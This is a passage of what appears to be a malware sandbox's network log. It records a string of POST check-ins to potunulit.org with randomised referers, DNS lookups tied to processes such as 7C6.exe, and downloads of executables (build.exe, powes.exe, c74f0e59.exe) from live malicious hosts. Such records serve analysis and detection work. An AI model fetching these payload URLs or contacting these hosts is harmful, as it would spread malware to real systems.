                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2d9eabff5b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://hwcgsfusph.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 326
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:07:55 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=te58kbEovUjH7zWUNWgPzz7V6%2F5LVPmoWzLyDMjV2t3b6u7IbxSPDeAkyS7GOJJahHDk0XOcUg5UdcfwA60tQ%2B9nwExvOoiII7HRtlB%2BbgN%2FzrQOx899S29zYAtlk6iS"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2d9eea94ab83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://vngwsmeto.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 304
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:07:56 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UX6ews1J7DZM31XGL%2B3DwSKrofLOjTxKdc0ZsIVxvHpst0K7AYwxPkx1LqCNuzrjMm%2F5UOs861CRZJbHTBEwUniLrvWUOV%2FM5gwjKNGU5qV%2FIqlHnH6PczgWR4RWx2XS"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2d9ef4991b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://wwoceg.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 120
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:00 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WdEVTvDlMisU0VqiejEWyvvvaNYMTOG5jA7D%2Fi45oXpzsw1mhsDcclRb01i6Wl27eI%2FVXOvANHW3T3ZPpVYVm9yH%2BMRuAO%2BaQlAyt442JohE4SLBOoUZJkJW9cUUTatk"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da0a5b2cb83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://wnvigcmog.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 306
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:00 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LLF8P0GApdJM3U47g1y1ui9R1bmwj%2FAY48EdvrXQ9y%2BI5JvWQxyXcDiQgJkYKKnDFnRIXqBvg9g8fzc%2BdCL6cQU4xKkvT4ofWg6cSttOLhGm7jcEr3hJBQB6xLYl8uAN"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da0b1b76b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://ywsbbfhl.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 324
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:01 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HICfSh0X%2FVqRoKd974sGVwrl5lJhibTv0TLn7VsDqyNGG%2BNUpQBQ8fEmd%2F%2FZytUCI9nH56khHNA2kIE58otsgKik930xDY2ogjCnlZhWbmYWbXuh8iEcZKlHPRDFa9gF"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da0edd1bb83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://rydsedgvt.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 153
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:01 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N8NgspBL2ciPII%2Fs5rtxeXeM1G7lNE5%2BjL6RV2Upv2NeA0UUmynDR8%2B3TarQS9egS77cPPyWYV7iG1PRJGJG4%2BrN9YsuCPk688d0uicOtDVpcfIBmNCrbb7WFJ%2FvS4Yh"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da0f6d4eb83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://gwgnh.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 308
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:02 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=e2h8CNPJ4Wx568%2Bcz8PNNcuetaJ32gbgWK8knL17%2BRK6M9IhUrUA%2Bvoor6C9K6sJ2pcHYw6Qe7KbyqGW5eU75e1O9etmdl4tAffPEVENbSxohb%2BIiPJpevj8luHR2MR5"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da18f8d7b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://fkfycmtjdc.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 208
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:02 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5hM7FbfZKuYAgCExo6ypmIGQUJcvWGGXUeQtCGEwPTIYHG5GTk%2FwYRwqArK%2FqkVBdgcAHc6IfNcnJkTOFYQm%2BLxlzAIOmjxFo7Gi8NZ88ELkPr8ifp3OTp5V%2BdG0%2Fcwo"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da199921b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://ohrnug.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 115
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:03 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MbzOHQUTVolUM0WJgpAtplccMSZyZ8TtjfvK2a3qZ%2Bi5T0QhxII6j8FWm0lPMLzE8K2XO2Bv8Tr7UxRPwmtsBfRAFcYMZ4v4aJgmHIiKU19akBfs8CbKJQnKDZRiSuoK"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da1b99f0b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://djekqg.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 303
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:03 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ezt9%2Be5DTaotYKwVmdHV51ZkUL%2BlpzReBY7tGvOKfaCqTHBbMRa6k7uOWP%2Fcht9NY1xHsIu1cfXq9q6N8uTlit7T9Cv5DpwAopk0s3e7YAJANNYmwuZ6LGhXc2GX71R3"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da1c5a3ab83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://wnnihgfg.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 171
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:07 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4oACFyu5aMoZOVmMrB0YWXgH9dQMIqCmZ58NCW%2B%2BX%2FyBNk6T6FZj4tFoAkeLvI%2Bu0ahTPBhz%2BwFMMX59tHidGHX5umQdQlzSMNIPVt1yS3VddUtdfvY3unD9qLWDgvV9"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da356b49b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://hyuaheriv.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 135
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:07 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U89Ol92iFxM49ETPCS8LBlbXgM%2F5e8JoLvhvIHvGHjPHb3JujpBS9tFVZG8hCTgZaXbNw1kkZfFEV5gcCqv9KnFFkQlH6O64I1yfJvIxfP6NlfZI%2FVWHF4vQCGUZBiR%2F"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da388c4ab83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://yjcorcvm.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 224
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:09 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OMikWuDx1jgiTgfOE5PSx%2FkTqjBCvfXwlstYcXltnz4LMa%2FkbfGR0%2FMArmEUs7mkSNIq5FypGuhO%2FMgtJjDIBtKs6Fi1yABneC3V0UEngrniIJNr9tgkLhMtpeMAqX74"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da45491cb83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://lfustc.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 247
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:10 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ecp%2FlCTLT3%2F78IlJHYrQH8fAAeSrjyqJC5ffHCVj%2BNY2wA6o2ZTBU6BEF4p9GZyWJI7yIxlJqk5R%2Fp%2F%2B%2FyyV21n1unfFzbvcEIakJ37uhhNB2sSucvtraz4C%2FQNVGjys"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da46a9a8b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://vipfbu.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 114
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:11 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E4djFv6BdIOMa0Q%2B%2BmvShSp6ejAP0za20CVe3PtP4OOU9HklzFsjhLpC8UXhB5BIziOFsiox4W9255qbslYl1wU8SMaKefL8QHDjcBo7Ifs%2FVaKGwJSZd3HPUCYrjOou"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da4c8ba0b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://luktqsaejj.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 331
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:11 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x46Dce8BGHpZ65Flgw1%2FATMTqQiP%2FlhYSHwr4OoGV289IxFIcCh8Q7HVaAWC98FXFvKk1AYGOrhJHojrUYJwAl%2BnxWrTmU2qB0wmHD%2BTbwRC93fDKLl2pfVWSr28McTz"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da4dac08b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://ugxoifnw.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 328
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:11 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FpyNPD1hrfyyDQtY4J3%2FwjFzFS%2BfBmJtaPAPs7WPOWvOPSZGjtQpa%2FeK6ivPWU7IUrQmqzg6fV7WZThIlGotHQxfjHaMwnysgzXEk%2F6ImKRv%2FUCrypFEvl3rCg4AhYAV"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da522d9bb83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://ramjf.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 307
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:12 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fgsF4JtbP%2BPZrii%2FmEM1jLo9B8xAnPJNG1uAlEWeJQd%2BBGI27Bu1MFcQ2TwhYegwqqe2%2BGiObGe%2BrwYgb%2FH6y2bdhYJuED2r7zrJaw1GGqz6GOg8Rv8zahQmw1FoKKT5"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da531defb83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://jmxsrgnexx.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 251
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:12 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QdKwlDcPRulbTQHv9hGBrjVv6zYMlZjhnFPl4Ht5xNocqNniwgKlUGmSV7CQcOc3VKxbDX1avDHa5o3YEPf%2B%2FfcFvxB2P8GOQBtUfCoOXEBmo6HeMkDFBbPMC21172HY"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2da57df9db83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    DNS
                                    uaery.top
                                    7C6.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    uaery.top
                                    IN A
                                    Response
                                    uaery.top
                                    IN A
                                    185.95.186.58
                                    uaery.top
                                    IN A
                                    187.170.21.149
                                    uaery.top
                                    IN A
                                    211.40.39.251
                                    uaery.top
                                    IN A
                                    211.104.254.139
                                    uaery.top
                                    IN A
                                    190.229.19.7
                                    uaery.top
                                    IN A
                                    178.30.120.200
                                    uaery.top
                                    IN A
                                    187.224.55.97
                                    uaery.top
                                    IN A
                                    211.119.84.112
                                    uaery.top
                                    IN A
                                    195.158.3.162
                                    uaery.top
                                    IN A
                                    175.120.254.9
                                  • flag-iq
                                    GET
                                    http://uaery.top/dl/build.exe
                                    Remote address:
                                    185.95.186.58:80
                                    Request
                                    GET /dl/build.exe HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Host: uaery.top
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:07:51 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                    Last-Modified: Sun, 19 Mar 2023 04:00:03 GMT
                                    ETag: "c5800-5f738d856a728"
                                    Accept-Ranges: bytes
                                    Content-Length: 808960
                                    Connection: close
                                    Content-Type: application/octet-stream
                                  • flag-us
                                    DNS
                                    144.181.67.172.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    144.181.67.172.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    58.186.95.185.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    58.186.95.185.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-de
                                    GET
                                    http://45.9.74.80/powes.exe
                                    Remote address:
                                    45.9.74.80:80
                                    Request
                                    GET /powes.exe HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Host: 45.9.74.80
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx/1.18.0 (Ubuntu)
                                    Date: Sun, 19 Mar 2023 04:07:59 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 1570304
                                    Last-Modified: Thu, 16 Mar 2023 21:53:23 GMT
                                    Connection: keep-alive
                                    ETag: "64138fd3-17f600"
                                    Accept-Ranges: bytes
                                  • flag-us
                                    DNS
                                    api.2ip.ua
                                    7C6.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    api.2ip.ua
                                    IN A
                                    Response
                                    api.2ip.ua
                                    IN A
                                    162.0.217.254
                                  • flag-us
                                    DNS
                                    80.74.9.45.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    80.74.9.45.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    akar.av.tr
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    akar.av.tr
                                    IN A
                                    Response
                                    akar.av.tr
                                    IN A
                                    159.253.45.38
                                  • flag-tr
                                    GET
                                    https://akar.av.tr/tmp/index.php
                                    Remote address:
                                    159.253.45.38:443
                                    Request
                                    GET /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Host: akar.av.tr
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:02 GMT
                                    Server: Apache
                                    Content-Description: File Transfer
                                    Content-Disposition: attachment; filename=c74f0e59.exe
                                    Content-Transfer-Encoding: binary
                                    Expires: 0
                                    Cache-Control: must-revalidate
                                    Pragma: public
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Transfer-Encoding: chunked
                                    Content-Type: application/octet-stream
                                  • flag-us
                                    DNS
                                    bz.bbbeioaag.com
                                    ss31.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    bz.bbbeioaag.com
                                    IN A
                                    Response
                                    bz.bbbeioaag.com
                                    IN A
                                    45.136.113.107
                                  • flag-us
                                    DNS
                                    38.45.253.159.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    38.45.253.159.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
